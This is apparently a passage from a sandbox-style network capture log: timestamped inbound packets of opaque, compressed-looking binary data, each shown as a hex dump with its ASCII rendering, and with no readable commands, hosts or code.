2023-11-18 09:02:40 UTC	3955	IN	Data Raw: 82 b3 c1 3a 9d 6e b0 33 d3 47 cd 41 8a ac 38 79 8e c5 c1 75 8e 25 16 e2 3c 73 c2 aa 08 66 ad 8b da 75 e8 d9 04 33 83 17 b8 c8 55 3f c9 b4 5e 38 e8 bf 94 d0 83 fe 2c dc 93 52 86 14 ed 49 45 13 5f 17 9d cc 43 c2 e9 13 2f 64 59 d7 c3 6e 32 a4 87 dd 08 68 08 d7 37 9b 59 c1 e9 4a ba 92 a6 5c 49 00 9f 14 35 2b 78 f5 bd 5d b3 82 b3 63 71 92 dc b1 04 cc d5 01 92 15 9c ee 29 c7 29 f7 94 5c 17 73 69 ba 0b c2 b3 82 3a e6 6a 56 92 b8 fd f4 f8 62 33 cb fa 5c bb 96 64 d5 a5 4a 97 97 b2 ae ca e5 85 57 ca ce 56 4c 2e 12 d6 b3 2e 35 de bd 1a dd e7 eb 94 4e 9f af eb 3e 5f 77 fd b0 99 15 9c db 4f b2 ae 07 3c 01 38 c8 bf 82 17 0d 28 b3 71 07 c7 9a d5 9d 40 e3 46 95 ad 57 77 02 8d ae 39 07 d7 46 55 c0 ba 7b 65 66 9c 1d 7b 17 d6 ec bb 3b 81 ce 0b 59 b7 af 37 33 e3 ec da e8 67 Data Ascii: :n3GA8yu%<sfu3U?^8,RIE_C/dYn2h7YJ\I5+x]cq))\si:jVb3\dJWVL..5N>_wO<8(q@FWw9FU{ef{;Y73g
2023-11-18 09:02:40 UTC	3971	IN	Data Raw: e9 27 92 3a 69 78 7d 64 a6 23 17 d4 fe 95 99 12 c8 e1 65 66 3a 50 34 92 7e 22 dd 51 0d 0f 32 53 20 33 d3 81 72 8a f4 93 5c 59 d4 d3 80 4a 88 f4 93 7e 7a ab 15 23 5a 4c 91 99 8e a4 b4 75 4a ec d7 f0 7d 82 00 a6 bd 0a 19 32 f4 93 e4 24 f5 73 e2 3b 2e 0a 9a 1f f1 fa 07 c7 bb 44 41 07 15 67 9a ad 24 ad 44 97 82 c6 7f 2f 0a 8a 4c 39 fb 49 e6 aa f2 94 ed b9 14 14 b9 bc f4 93 7c fc 7d 81 4d 1b 95 63 b4 7d 29 e8 60 e2 31 d1 fd 8c 0e 26 f0 12 5d 0a 3a 86 f6 bc 46 fe 60 ff ca d1 45 41 73 86 4f 39 b6 28 e8 18 e7 52 d0 31 9b 28 68 46 27 7c ec a9 bd d1 91 45 47 3c bc b4 37 0a 74 29 28 2a 3b d1 4f 6e 52 5c 1a da 32 05 9a 7e 9f a0 33 39 fd 04 4d c6 ed 27 23 55 9c 1c 5e ce b5 c8 8b a5 9f 8c 4c 20 f4 f0 60 84 35 50 2a 89 6a f8 88 b0 ce 27 bb b7 f2 94 31 83 11 d6 40 dd 11 Data Ascii: ':ix}d#ef:P4~"Q2S 3r\YJ~z#ZLuJ}2$s;.DAg$D/L9I\|}Mc})`1&]:F`EAsO9(R1(hF'\|EG<7t)(;OnR\2~39M'#U^L `5Pj'1@
2023-11-18 09:02:40 UTC	3987	IN	Data Raw: b7 01 ba bb ce 01 b5 0d 12 60 d4 1c d4 46 f6 1b a4 36 72 50 e3 95 ce 7f 03 9e 72 e8 1c 90 d5 a3 00 ba 47 cb 88 12 03 ec 1e 2b 6f c4 1b a0 7b d6 ed b2 01 a0 64 ea 08 ef cd 6c 8e f0 82 52 2a 69 2b 99 a3 f8 eb 4c 9d ec f9 55 cd e5 9f 54 dc 85 5a 97 d7 55 02 d8 bd 6a 4c 02 5f 7e 1e 09 68 72 c5 4d e2 fc f2 eb f2 d0 3b d6 50 2a a4 cf 87 81 3f da d2 e5 8e 0f 4b af ec f6 91 7d 65 3f 65 00 59 12 c1 d5 f5 f2 c8 26 d0 61 ab c6 30 06 0a 34 d8 71 4d d8 4a 04 0a ec 70 fc d8 40 15 80 0e 4b c2 d9 3f 1d 48 65 d0 c5 ae 31 b0 f2 23 01 34 b1 2f 62 41 df 8f 04 13 76 db db 20 80 a5 75 a3 52 5f 1e 50 c4 a6 9c a7 a5 29 e7 29 aa 65 f2 00 03 94 74 05 7d a6 34 41 9f 35 fc 42 2b 67 12 80 2c a9 64 17 53 d7 04 48 89 0a 57 af 4f 7f fe df 61 a0 cf 50 23 23 79 4f bb 05 2c fd 4c ff 80 09 Data Ascii: `F6rPrG+o{dlRi+LUTZUjL_~hrM;P?K}e?eY&a04qMJp@K?He1#4/bAv uR_P))et}4A5B+g,dSHWOaP##yO,L
2023-11-18 09:02:40 UTC	4003	IN	Data Raw: d3 3f 00 ee f5 38 e6 22 e0 98 91 ae a0 02 68 6c f5 07 34 70 4d ee c5 6d 5a 2d 0c 18 27 d7 66 6f 36 ea 6d e0 1e 4c a0 58 e6 aa 0a 14 2b 2f 75 99 b7 52 13 83 83 62 9b dc 59 bc 0c ac 52 0f 3a eb 14 0d 48 b1 b6 bd c5 dd b6 6c a0 ee 3e db cb ce 06 40 65 d3 f2 3a b9 73 0f b8 0f fb 9f 14 77 27 71 c0 50 da 6c ed 21 c2 7d 3c b2 87 48 50 54 c6 a0 81 84 dc 35 72 58 14 9f b9 0d dc 83 a2 da 48 2b 01 87 8b 87 ef 8b 3d e1 01 5c 9c 00 a0 3e 34 b5 0a 00 6a 4f 5f 67 c0 f8 b5 14 a8 62 47 d5 79 5b 0a a8 95 f7 e4 de b5 5b 87 db 40 c5 ba 16 6a 35 f5 02 d4 9c 7b 8f e6 c7 65 fe 3a 00 73 9f e7 75 d6 7f 1e 20 95 32 53 6c b5 fc 03 cc 3d 1c 73 85 56 02 2c 7b ac cf 1d 07 e0 70 f1 46 08 90 8f 4b 01 84 6c cf 95 1b 00 f7 ee 25 da 43 13 80 ec dd 6b f1 f7 14 67 2d d6 ec ec 04 13 7f 2e 05 Data Ascii: ?8"hl4pMmZ-'fo6mLX+/uRbYR:Hl>@e:sw'qPl!}<HPT5rXH+=\>4jO_gbGy[[@j5{e:su 2Sl=sV,{pFKl%Ckg-.
2023-11-18 09:02:40 UTC	4019	IN	Data Raw: ea 80 62 48 73 84 b4 2b 1d 64 48 b3 67 95 2b ea d8 72 3d 57 4f 86 cf 3b 5d 5e a9 91 3d a2 71 34 da f0 bc 50 b7 d8 f0 7a 67 a4 b3 c7 a4 bf 7c 82 e9 aa d6 a3 4b d0 ee 6a 3d a0 68 7e f3 ac ea 31 bf f5 ce 00 68 8f 60 bf b3 70 a0 9c cf 7a 79 d7 f6 61 9e dd 77 3f b7 6b fb 30 e3 ee 36 21 74 d7 f6 01 c5 90 66 7f 06 d7 f6 a1 49 fe de 13 c2 f9 63 6d b6 5f d3 c7 25 7f 40 b1 e4 8f 5f de 25 7f 1e 6a 30 49 be c7 7b bc 7c 6e 40 d6 81 a5 6b 12 5c 7e 3c 1c 85 67 60 6e ba b6 c2 87 d5 c0 b2 19 45 ed 9e 8c cb 76 08 04 de 6f 0d 6f dc b6 2c 20 52 7d 1d 97 09 2c 04 fb de ea 49 9c e2 10 22 5d 73 2b 4e e0 0e 62 7c 16 77 b7 65 a1 ab 82 91 97 b0 11 63 1d a2 3f cb da d0 e7 cb 26 04 c4 45 ee 26 67 0c 6a 5d 15 8c bc cc b8 82 11 a8 7b 5f 12 75 57 30 02 55 cb 7e f9 19 83 5a 57 5a 59 7f Data Ascii: bHs+dHg+r=WO;]^=q4Pzg\|Kj=h~1h`pzyaw?k06!tfIcm_%@_%j0I{\|n@k\~<g`nEvoo, R},I"]s+Nb\|wec?&E&gj]{_uW0U~ZWZY
2023-11-18 09:02:40 UTC	4035	IN	Data Raw: be 86 8c 3b 0a e9 7c 74 03 f0 d2 e4 5c 9e cf fb c5 e8 a5 ac 41 67 29 78 31 7a 6d 29 5c 75 73 94 2f ec be 71 08 09 a3 57 36 89 d1 6b 9f 9b 65 f4 72 07 05 a6 8b 65 af b2 6e 81 e1 e2 38 36 a1 44 60 b9 38 3e 48 b6 15 18 a0 5b f6 aa 9f 50 82 bd 2a 24 d9 ab 7e fa 4a 80 92 c3 d7 eb 2c d2 1f 17 cb 30 e5 67 22 40 4f 56 f1 26 1a 58 89 ee ed b3 df 19 1b d4 c2 ff aa 7e dc 72 c6 b2 6e 5d ed 55 6d ec 3e c1 ca 39 ee fc 71 df 17 06 9e 2d d9 c0 e3 c1 5f 18 78 5a 50 39 d6 be 4a bc 8e d4 5e 9f 9a 9a 77 86 f5 84 54 f4 f1 06 f4 5b e6 a0 ec 09 e6 a0 76 cb aa cb 44 16 b0 12 d9 3b 53 49 c3 ee 13 56 8d b3 f1 bb 33 50 27 a4 f7 f4 bb e5 b9 41 79 b8 5f b6 2d ca c3 fd a1 38 ac 44 0c a7 61 25 0a bf ed e7 4c 88 86 dd 27 2c 26 da f8 f9 51 35 2c 39 5b 92 25 27 9b c4 92 b3 77 07 32 d9 fc Data Ascii: ;\|t\Ag)x1zm)\us/qW6keren86D`8>H[P*$~J,0g"@OV&X~rn]Um>9q-_xZP9J^wT[vD;SIV3P'Ay_-8Da%L',&Q5,9[%'w2
2023-11-18 09:02:40 UTC	4051	IN	Data Raw: ee d3 20 68 e0 c4 aa 05 87 16 58 4c a4 81 13 94 17 a7 36 e5 65 cd bb 27 4d 10 2c 72 46 4f 9a 20 68 20 61 c5 32 d0 b0 e2 c0 7d 7a ba eb 11 42 55 93 9c 61 7d 80 e6 0c 9f d0 17 89 05 42 45 be bd 43 06 c1 22 57 5f ae 45 11 8a 2e 72 30 05 2d 59 57 fb 6b 62 c9 94 96 2c d0 52 54 ed 97 69 29 0b 9c 7a 0d 16 20 68 09 a1 bf 6a c2 0c fd 4d 2e f5 9e 55 bf 97 b1 28 6b e1 80 91 8b f4 01 a3 53 cf df 6e d6 97 f9 27 e7 ff 6f 37 a6 cb fc 93 45 5e 2f 27 92 cb bc de 38 4d 70 4f 9a 20 58 e4 03 67 10 65 f2 d8 19 64 25 a2 b7 7e 2a f3 7a b9 02 5c 0d 87 79 bd 91 77 ff d5 d9 09 08 a5 be 0b 00 0a b1 9d 1a 87 ab ff fa b1 90 25 d1 53 2c 08 59 02 e4 ca ef ca db c8 95 45 ba af 7e 58 d3 7d 33 34 bb 29 78 ec 7f b2 9e af 73 47 29 54 ab 1e 70 5b d4 c6 3e e6 b6 e4 95 80 9f b6 c4 de 2a 39 9e Data Ascii: hXL6e'M,rFO h a2}zBUa}BEC"W_E.r0-YWkb,RTi)z hjM.U(kSn'o7E^/'8MpO Xged%~z\yw%S,YE~X}34)xsG)Tp[>9
2023-11-18 09:02:40 UTC	4067	IN	Data Raw: 59 be 29 25 51 f9 75 19 68 5c 32 e3 4a 0a e9 7e f1 6f 53 74 03 f2 37 e9 76 03 da d4 73 76 d4 04 d2 a4 d7 7c 68 47 40 df a4 1f a7 21 01 7d 93 7e 9c 86 08 dc 7d fa c9 17 46 50 a3 38 d3 b6 09 58 08 6f e2 a3 4a df c4 af f5 26 f4 5d 40 dc 0a 7d d7 00 5c 11 fa be d6 9b d0 77 01 35 47 a1 ef ae 32 42 df 37 75 3c 8f 08 fc 05 69 64 f4 52 b7 22 c6 1d a1 9a 67 cb bf 22 3c 1d 41 9b ed 4e bd a7 b3 57 6f ea 44 2c 10 f8 6f 78 13 b5 2e 60 d9 2b 4d d4 02 12 b2 8e 1b 90 80 1a af f0 74 fa 88 10 f8 7b af f3 66 a2 80 64 2f 3c 27 18 cd 01 90 de 0b 37 8b c9 6d c3 f0 42 4f 0a ef 65 01 57 d9 cf 26 1e ff 9a bf f7 e2 0b 8b da de 12 b8 ca 39 cf e0 5e 7a 61 71 c0 79 2f 82 80 0c ba 8a 99 e7 0c 2b 89 81 b9 ef d8 54 1a 54 15 3f 91 b2 d6 c0 dc 35 62 55 0c 2c bb 46 44 a5 41 61 f1 09 66 37 Data Ascii: Y)%Quh\2J~oSt7vsv\|hG@!}~}FP8XoJ&]@}\w5G2B7u<idR"g"<ANWoD,ox.`+Mt{fd/<'7mBOeW&9^zaqy/+TT?5bU,FDAaf7
2023-11-18 09:02:40 UTC	4083	IN	Data Raw: fa c7 bf d8 a0 87 bd a2 66 00 11 f2 84 7c 02 22 c4 66 b6 12 12 33 9b 12 b5 f6 7d 8d f7 15 33 9b 52 af f6 b2 aa 18 b0 6a de 47 72 a7 c0 fe fa 2a 30 61 bb 94 b9 af 55 00 03 f6 78 fe dc 47 45 82 8a 5a 09 29 01 11 e2 54 48 ab 75 fe dc c7 5b fe 98 f9 37 18 20 64 7b 9c f6 0d 98 f6 ca 52 ff c8 de 28 93 2e ca 56 43 be 34 03 14 24 41 79 09 c9 dd 8c 92 8c 6a ef c3 b6 dc 80 2e 9b ef 66 d8 99 0a 30 ed 0f 2a fb f2 91 1c a9 ec 2b ca ff cb 2f 61 d7 ff f2 1e be ad 32 dc 01 e8 b2 5d 55 6e 25 40 5d 5e ef e3 b9 36 34 f0 ac 92 13 9c 8b 20 7f bc 0a b8 75 f3 5b 4b 6b 03 69 a2 da 2d da f8 d1 da 40 5d 5e 0a e5 a9 c9 06 b0 90 e3 b4 63 0f ad 0d 6e 21 f7 c7 d9 7c 17 a6 d6 01 43 ec d1 48 6a fd f1 2a 70 cb 96 85 7d be ab 35 40 ad ef 2e 2e 5f 1b 7e 7a 15 90 ec 76 2f 4f 55 0c 3e a0 89 Data Ascii: f\|"f3}3RjGr0aUxGEZ)THu[7 d{R(.VC4$Ayj.f0+/a2]Un%@]^64 u[Kki-@]^cn!\|CHj*p}5@.._~zv/OU>
2023-11-18 09:02:40 UTC	4099	IN	Data Raw: 57 97 c8 a7 28 48 44 2a 48 89 75 e5 f7 40 40 d4 cf ff 39 12 b1 1d 34 c5 bb 28 9a e2 c5 40 9a 2f f5 2e 90 25 e2 4e 51 e6 04 a2 2a 06 1c 81 52 42 8e 40 11 f0 06 9e fd aa 15 90 8a 6a a7 c2 83 1b a9 1d b1 b2 5f 3e e3 10 b1 1d ad 3a 71 5f 22 56 b7 0f a7 61 34 d2 28 19 f4 b9 a3 f1 8c 88 45 45 76 e3 5c 6b 89 58 ab c9 04 95 fa a3 26 33 54 82 bc b1 ad fd 2c c6 ed 6d ed 1d 39 53 cf a1 69 89 88 b5 9a cc 02 a9 96 cf 7a 79 30 4c e6 0e e4 52 44 24 09 46 e8 d1 8f 33 87 d7 8f 20 cb da d5 1d cd 5f 70 32 df e0 96 d0 fa 11 5b cc ab 6d e5 c3 eb 47 90 b1 43 4e 89 ae 1d 72 90 2b 17 61 22 d7 0a eb 47 4a 78 fd 08 32 d6 8f d4 e1 f5 23 02 a1 45 27 5a 22 50 32 5a 2e 90 8e 97 46 12 8f 72 53 e2 6e ae ee bc e7 f5 92 b8 a7 bb 7d c5 01 24 25 d6 59 57 32 46 db 7d b5 e4 7a 1a e4 ad 00 4d Data Ascii: W(HDHu@@94(@/.%NQRB@j_>:q_"Va4(EEv\kX&3T,m9Sizy0LRD$F3 _p2[mGCNr+a"GJx2#E'Z"P2Z.FrSn}$%YW2F}zM
2023-11-18 09:02:40 UTC	4115	IN	Data Raw: 71 9e 88 83 92 2f 27 89 c6 af 71 e3 e5 fc fa f5 95 d4 29 e0 d6 2f 56 a3 48 55 1a 6d bf b5 22 69 34 ee 28 fe fd 4a c2 75 c4 01 b5 5c b3 14 4d 0a d6 7c 3c e2 2d fd ef 95 d4 25 78 32 0a 94 28 05 79 88 5f 44 1b 68 fb 65 0d 50 0a f2 0c af 88 c6 b1 68 f0 a4 c6 ad 6c ff ff 67 ea 4c 76 6c b9 6d 30 bc 3f cf 92 45 95 66 2d db 43 1c 27 b9 46 e0 38 06 7c df ff 41 52 fc 07 aa 16 0d e8 03 9b a2 54 a7 4a 23 45 21 b9 7c 20 4f 44 e3 cf a0 22 fc 00 ac 31 14 a6 fd 69 a0 e6 19 b0 90 d0 b6 c7 fd af f1 4b f1 3b 17 e1 f7 c0 09 c5 7c af 70 42 91 ef d5 33 f1 bd b3 59 12 0d 09 8e cf 84 a8 50 50 11 61 c3 1a 55 11 36 36 83 27 1d 1b dd 15 8c 66 33 ba 6d 96 8a a4 ac 78 cb b1 35 7c cb 71 0c cd ce 60 5b b4 24 c0 a5 fe 7f 57 56 5b 97 fa ef aa fe 43 59 65 ff 11 f7 1f cc 5c ad 15 35 0b 72 Data Ascii: q/'q)/VHUm"i4(Ju\M\|<-%x2(y_DhePhlgLvlm0?Ef-C'F8\|ARTJ#E!\| OD"1iK;\|pB3YPPaU66'f3mx5\|q`[$WV[CYe\5r
2023-11-18 09:02:40 UTC	4131	IN	Data Raw: b9 2a dc bc b4 41 06 72 b7 5f ab ec 03 0b 90 be 8a a1 ae 35 19 ba 42 5d 83 6c 0e dd 64 64 8e 09 5f b2 bf 0f 23 ed 38 7d e0 88 e3 76 8c 3c e2 74 5a 59 f8 73 65 65 11 64 98 5c ec 31 0f 24 e1 b4 99 70 b7 cb 66 02 64 9b a9 42 22 d2 57 c5 7b 74 fe e7 81 3c 50 0c d9 ed 81 52 c8 6e 90 e3 bc f6 64 08 44 19 83 b6 06 ea c4 21 5b 03 90 b0 68 d4 e7 06 52 ef c6 63 4d e4 38 fc 7a 24 ea 2a 88 e9 67 19 f4 52 66 41 81 eb c2 ef ef 47 22 c9 60 20 71 ed b5 43 81 c4 41 32 43 c5 cf c3 48 b3 9d 8e 2c f9 55 70 64 51 c1 3c f5 c6 62 24 e1 f4 4a f1 57 b5 bc 4d 8c 86 bb 81 8e 83 40 12 7e c1 87 57 eb 6e 5c c8 b4 dd 8d 0b 9e 16 ae ea a2 a7 05 48 6c db 1a 0f a0 e9 02 67 d5 15 72 3b ae 6b ec bd 16 c8 55 65 36 5a 23 57 85 8d 3e 39 72 a3 47 46 95 07 07 f3 54 93 b4 0d 8b 91 39 a6 dd b9 84 Data Ascii: Ar_5B]ldd_#8}v<tZYseed\1$pfdB"W{t<PRndD![hRcM8z$gRfAG"` qCA2CH,UpdQ<b$JWM@~Wn\Hlgr;kUe6Z#W>9rGFT9
2023-11-18 09:02:40 UTC	4147	IN	Data Raw: f7 95 48 4d 0d 64 2a fc aa 9f 7d bc 73 b9 1b c8 8d fb 73 16 14 bf 06 03 f7 51 df 3f 5c 90 cb dd b8 92 b0 4c c8 3a 70 71 e8 71 8c 2b d7 c1 81 a3 be 7f 92 71 e5 3a 48 5e 19 ff 88 e6 95 09 71 3b dd 12 f9 99 8f cd 3f 28 e4 a6 10 c4 ff a1 67 3e 14 c4 0f b1 1e db da a1 4c 3a 10 fb b1 ad 75 36 ab 10 eb 3a 76 fa 81 5c d0 ce e5 6e b4 5c ee c8 76 93 35 7a 2e 77 03 3e c2 59 43 3e c2 10 db b1 e5 74 d0 46 88 b0 65 64 0d db 32 06 36 32 7b fb 31 66 9e 52 07 8c 1c 59 63 e6 02 39 56 39 66 fb 58 b9 0e 8e d5 8e 23 c0 b0 91 23 c4 79 ec fa c6 ca 05 72 5e e7 29 75 5e 3e a5 92 f4 de 7b 1f 92 de b3 00 d9 65 e8 48 2a 44 e5 f4 95 95 19 97 88 dd 6d 17 73 40 fc f7 95 88 bd 6a f4 75 d6 64 68 f6 75 7e c4 31 8f 83 62 20 75 f7 f9 72 81 3e e6 f3 2b 11 95 f7 7a 1e e2 80 a8 bc 8f 9e ec d9 Data Ascii: HMd}ssQ?\L:pqq+q:H^q;?(g>L:u6:v\n\v5z.w>YC>tFed262{1fRYc9V9fX##yr^)u^>{eHDms@judhu~1b ur>+z
2023-11-18 09:02:40 UTC	4163	IN	Data Raw: c7 d7 23 91 24 66 5c de a5 c4 74 50 d3 1a b1 8b da bd ca 68 f2 9b 44 82 2f 2b 9f 4e f0 b5 06 2f bd ad 23 2f bd d7 60 2c 80 c7 91 b1 00 6b 30 b0 30 95 3b b0 70 4d 5e b2 f2 c2 8d 88 3a e6 f9 48 22 46 d4 c5 78 a4 10 01 d2 a3 0d f3 c3 f5 90 b0 73 4b 90 8f ff f9 cc 88 f5 35 0b f2 78 59 a2 38 8f 57 14 42 be d2 eb 85 48 4d 35 6c 84 e9 3c 0c a4 69 9f 0c 01 d7 eb 33 33 04 7c d1 ba e4 43 1c ad 4b 60 44 39 c0 34 b1 12 85 44 38 30 ee aa 56 44 f8 70 c2 63 1e 21 c7 58 96 84 3a 18 67 8d 9c 2e 1c a0 50 01 23 92 6d f8 6e 42 68 92 d1 f0 5e c1 73 59 a8 98 51 bd 93 11 4a 89 bc 64 15 aa 66 a4 85 9e a8 b0 bb b1 af 78 5d a9 23 10 25 ae 8a 4b 0b 78 02 12 55 4a dc 3f 9f cc 60 26 54 c4 c0 37 f8 6f 49 b8 3c 46 90 28 8f f1 ed c7 91 88 3a aa 02 c0 d8 54 75 00 d8 8a 90 84 4c 6d 26 84 Data Ascii: #$f\tPhD/+N/#/`,k00;pM^:H"FxsK5xY8WBHM5l<i33\|CK`D94D80VDpc!X:g.P#mnBh^sYQJdfx]#%KxUJ?`&T7oI<F(:TuLm&
2023-11-18 09:02:40 UTC	4179	IN	Data Raw: a8 7a ee 37 3f 20 8b e3 33 08 75 17 64 aa 68 21 f5 63 cc f8 14 fd 8f ab 9a fa 14 c5 d5 c2 7d 9f 41 0c 54 5d 10 47 19 cb c0 4d 95 0b c6 a3 e7 d3 2e 37 7b 05 f5 63 a0 23 a2 70 be c2 f4 f6 ca 57 98 2c 18 3c 86 53 06 92 35 53 c6 de f1 33 ee b9 10 5b 35 98 b0 4c d3 67 38 61 59 dc 20 cc 4c f3 21 44 e1 11 fb 28 dd 5b 89 54 55 f8 ec f9 48 46 a4 aa 4a 3f 07 45 22 71 54 5c ac 7f 93 8c ea 8b f5 c8 d9 14 47 32 ea 25 44 12 de 4e d2 27 21 c9 60 cc 01 73 38 e6 c0 26 f9 e4 58 3f d4 f0 93 e3 4d ae f3 66 54 88 55 cd 0b f7 ce da 13 81 28 7c de d8 e1 c4 01 d4 55 80 1d 4e eb 1c 51 63 de 2a e0 eb b3 ff 7d 25 aa 2a c0 43 cf 8f ab 5a 9e bb fb 9b 14 16 16 57 55 6c 61 89 68 74 38 98 7c 7b 25 32 c7 cc f0 69 42 92 51 e1 d8 ab 9e 03 a9 aa 0a 7b 89 5b 55 6d 2f d9 24 1c 7b 35 13 81 a6 Data Ascii: z7? 3udh!c}AT]GM.7{c#pW,<S5S3[5Lg8aY L!D([TUHFJ?E"qT\G2%DN'!`s8&X?MfTU(\|UNQc}%CZWUlaht8\|{%2iBQ{[Um/${5
2023-11-18 09:02:40 UTC	4195	IN	Data Raw: 4d 3b cf 39 6d dc e7 9c 8f 18 29 46 f9 d7 56 27 1c 3d 22 39 9d 3c 0e 73 3a ad 88 22 2d fb 66 a8 ce f9 81 58 7d 2a 23 24 1b ab 67 45 68 21 f5 8a ec 49 79 29 45 ca ae da 5e 28 8f 88 34 89 8d e4 42 d2 68 26 17 7a 44 52 05 59 c3 54 41 2b 48 78 8a cf d5 84 64 a3 f2 1b e7 8f c3 48 8f 5a 6b 3d c9 08 84 38 c0 16 e1 05 39 25 40 32 8e 43 61 0f 10 48 36 3a 76 c8 9f dc e0 1d f2 23 be 6c 84 81 b4 c2 b5 8e 8d b0 96 57 20 d9 18 d8 bd 5a 63 78 f7 fa fc 97 d8 c3 b9 57 d3 7b b8 47 5c 49 d8 49 a4 c7 59 25 83 3c 57 2e 19 14 22 d2 87 3c 0e a7 0f 85 18 7b b5 ad a1 d0 a1 10 5f b6 06 44 d3 0d 2d 0f 91 88 34 8e 05 a6 db d4 10 d3 6d 88 38 ed 4b 0d 9d f6 41 8c f7 47 6a 78 97 11 e2 f6 1a 10 71 1c fd 44 70 8b 96 57 20 1a ef 2c 54 af bf b6 bb 50 7d 88 88 4e d0 5c 01 59 63 5e fb 1f ec Data Ascii: M;9m)FV'="9<s:"-fX}*#$gEh!Iy)E^(4Bh&zDRYTA+HxdHZk=89%@2CaH6:v#lW ZcxW{G\IIY%<W."<{_D-4m8KAGjxqDpW ,TP}N\Yc^
2023-11-18 09:02:40 UTC	4211	IN	Data Raw: d8 10 11 7f 45 84 bf b6 16 f1 f5 49 23 f9 fa 9e a1 01 b9 32 3b 28 84 56 95 d8 3f 14 85 7f 0b a1 83 71 00 19 8f 0f 3b 08 24 1b e1 be dc 7a 39 85 86 0a 10 a4 f3 f9 f7 2b 11 ab 02 6f 9c bc 6a 44 4d 55 d5 ea 24 d9 46 4b 05 e7 b2 9c 90 6c 54 30 9e c0 21 24 64 1b 1b 29 32 bf 5e 89 d8 41 c4 33 e9 ca 18 91 86 44 54 73 ae ca 54 73 21 c2 1d 9d 1a 72 47 87 38 33 32 53 48 c6 db f1 53 0b c9 78 9c e9 e5 20 22 10 50 c6 3b 1c 10 36 de e5 80 08 11 eb 44 57 d5 b5 4e 84 18 4b 9c 5f b3 60 a5 8d 20 7b f1 5f 0b e4 aa c0 33 f1 fd eb 95 a8 b9 20 16 45 fa cf 47 57 b0 11 44 13 0c 1b d9 f8 39 2c 16 b2 71 1c 16 ff f8 fb 95 c8 c6 e1 a1 3f 1a 5c 5f 3d e2 b8 33 90 94 c8 cf 15 4f fb 3c ba 3e ed 8b cb 7f e1 d3 cb 21 99 72 79 43 ac 3e cd 10 92 8d 19 11 8e 9c f4 85 8a 0b ba e3 2c 85 ac 31 Data Ascii: EI#2;(V?q;$z9+ojDMU$FKlT0!$d)2^A3DTsTs!rG832SHSx "P;6DWNK_` {_3 EGWD9,q?\_=3O<>!ryC>,1
2023-11-18 09:02:40 UTC	4227	IN	Data Raw: 22 79 4b bb 38 40 e4 68 52 f8 73 44 8e 48 a9 bc 88 b3 e4 d6 13 56 af ba bc 57 ab 20 1c 7f 03 d6 13 86 d9 98 0b e0 88 23 9f 69 43 08 88 57 20 79 51 bd 5a dc 10 b2 cc f0 f4 55 5b 9b eb da b2 ed 88 4f 4f 77 3f 72 84 37 f2 07 ff 50 03 b7 90 ce 1b 2d 7b c8 fb 95 87 bc 91 0d e8 fb 25 40 de dd 5b 1d 98 8f 84 d5 81 61 a6 4d 27 20 92 23 86 85 93 61 57 79 c8 1b 99 7a 7c 56 bb ca 43 de 51 1e c3 11 39 da 4e ae c1 d6 de 6b d9 3d 9d 1b 00 91 bc a7 fd 2b 43 9c 25 1b e1 30 ea d5 90 4f bd c7 8c 38 00 20 8e 7c a6 23 08 20 f6 0a 71 32 fc 47 ed 25 d7 79 a3 04 c7 af 6a 90 eb bc 11 40 a3 ee 6e 9e 4d 94 bd b3 4f bd 37 7d ea fa d8 d4 e0 6e 14 d0 62 c3 8c e5 12 0a d1 3c de 80 58 1c 7f ba 40 85 0d 10 55 f8 fd 23 d4 bc 21 32 c3 1c 91 a3 a6 1d 2f 20 de aa ad 98 0c 40 ec 6e 6f f1 29 Data Ascii: "yK8@hRsDHVW #iCW yQZU[OOw?r7P-{%@[aM' #aWyz\|VCQ9Nk=+C%0O8 \|# q2G%yj@nMO7}nb<X@U#!2/ @no)
2023-11-18 09:02:40 UTC	4243	IN	Data Raw: 1f 88 1c 88 c4 bd 09 19 88 1c 33 65 15 03 f1 06 67 88 31 5f 44 72 44 e2 f4 3e 14 89 f3 c5 b2 54 a0 2e 22 79 2a 98 7c 11 c9 11 89 d3 0d 2a 12 d7 7a 2a 98 7c 11 c9 57 fa 09 3b d2 f0 c1 56 ab b7 36 00 22 39 42 74 bf aa a3 69 f8 58 9e 13 bb 42 74 fe 8e 67 22 57 88 0e 9a 6e 31 f5 75 85 e8 4e b3 e5 71 a5 10 dd 69 ce f0 c3 01 91 3c ef da 02 7a e4 e3 93 52 b3 81 3a 3b 5a ac 07 f1 fd 7f d8 e1 33 f5 5b f0 02 4d 76 24 57 18 d0 23 1f 08 d1 f1 5f 3b 14 a2 3b cd 1e 39 2c 40 24 47 88 4e e4 0a d1 b9 57 24 ec 12 20 92 23 44 f7 1b 8f 50 88 ee 34 dd ab 26 0e 85 e8 4e 33 ad bc 80 48 5e 53 6a 9d 23 0e b8 81 10 1d 47 fb 50 88 ee 34 a3 2a c9 45 24 6f 51 38 e7 22 92 df 10 1d af 4a 21 3a a8 f2 25 72 85 e8 4e b3 47 2a 30 10 c9 11 a2 e3 ab 1d 0a d1 b5 31 92 4b 0f 88 e4 08 d1 71 66 Data Ascii: 3eg1_DrD>T."y\|z\|W;V6"9BtiXBtg"Wn1uNqi<zR:;Z3[Mv$W#_;;9,@$GNW$ #DP4&N3H^Sj#GP4E$oQ8"J!:%rNG*01Kqf
2023-11-18 09:02:40 UTC	4259	IN	Data Raw: d4 f9 e4 4a a5 6e c5 94 8e 01 68 b2 22 b2 1c 3b 7a 32 cc 6e 98 ba 92 63 ef 2d 6e a5 64 74 f4 d4 5d d8 3a bf 5b 03 20 6a 55 93 79 60 2a 2b bb 15 91 c0 e1 ef 5f 42 d4 2a 6f 9d 81 28 a3 25 be 1a 10 d5 6d 29 0e e4 54 82 77 67 d1 1e 6e 26 c0 a2 a5 f0 1c ad 67 2a f3 bb 15 6d 5e 49 46 d7 bc f2 94 f0 d1 42 f3 6a c1 79 38 5a f0 b2 66 ae 91 82 31 03 51 06 76 e1 6a a1 5d f8 2d a6 60 cc 40 94 81 ed b9 5a 68 7b 3e 77 ce 1e 01 b4 59 91 36 a9 53 79 dc 9d 26 1c af 81 f2 b8 5b 71 47 28 c6 a9 3c ee b7 88 4d 2a 7f f3 ad 4d ea f4 04 ef ef 93 3a 95 e0 dd 8a 29 18 1a 10 85 b7 c4 77 9e 4a f0 6e 45 f0 9d ff f9 25 44 19 f0 df fd 83 5d c9 7f 17 ac e6 98 57 5b fe bb b7 98 e2 4c 00 bd ae 8e 45 1e d5 a2 6f e8 69 75 e0 61 ca 16 47 1e a6 d3 f2 97 a7 16 f2 17 bd 87 9d 4f 5c 47 03 b9 56 Data Ascii: Jnh";z2nc-ndt]:[ 